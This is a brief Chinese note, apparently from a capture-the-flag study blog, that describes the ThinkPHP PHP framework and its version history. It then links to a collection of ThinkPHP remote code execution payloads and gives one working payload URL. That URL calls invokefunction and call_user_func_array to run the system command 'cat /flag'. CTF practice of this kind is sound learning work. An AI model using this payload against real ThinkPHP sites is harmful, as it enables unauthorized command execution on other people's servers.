ThinkPHP介绍
ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。
ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列。
漏洞:
Thinkphp远程代码执行 payload汇总 :Thinkphp远程代码执行 payload汇总 - 逗比大师 - 博客园 (cnblogs.com)
查找flag的payload:/index.php?s=index/think\app/invokefunction&func tion=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag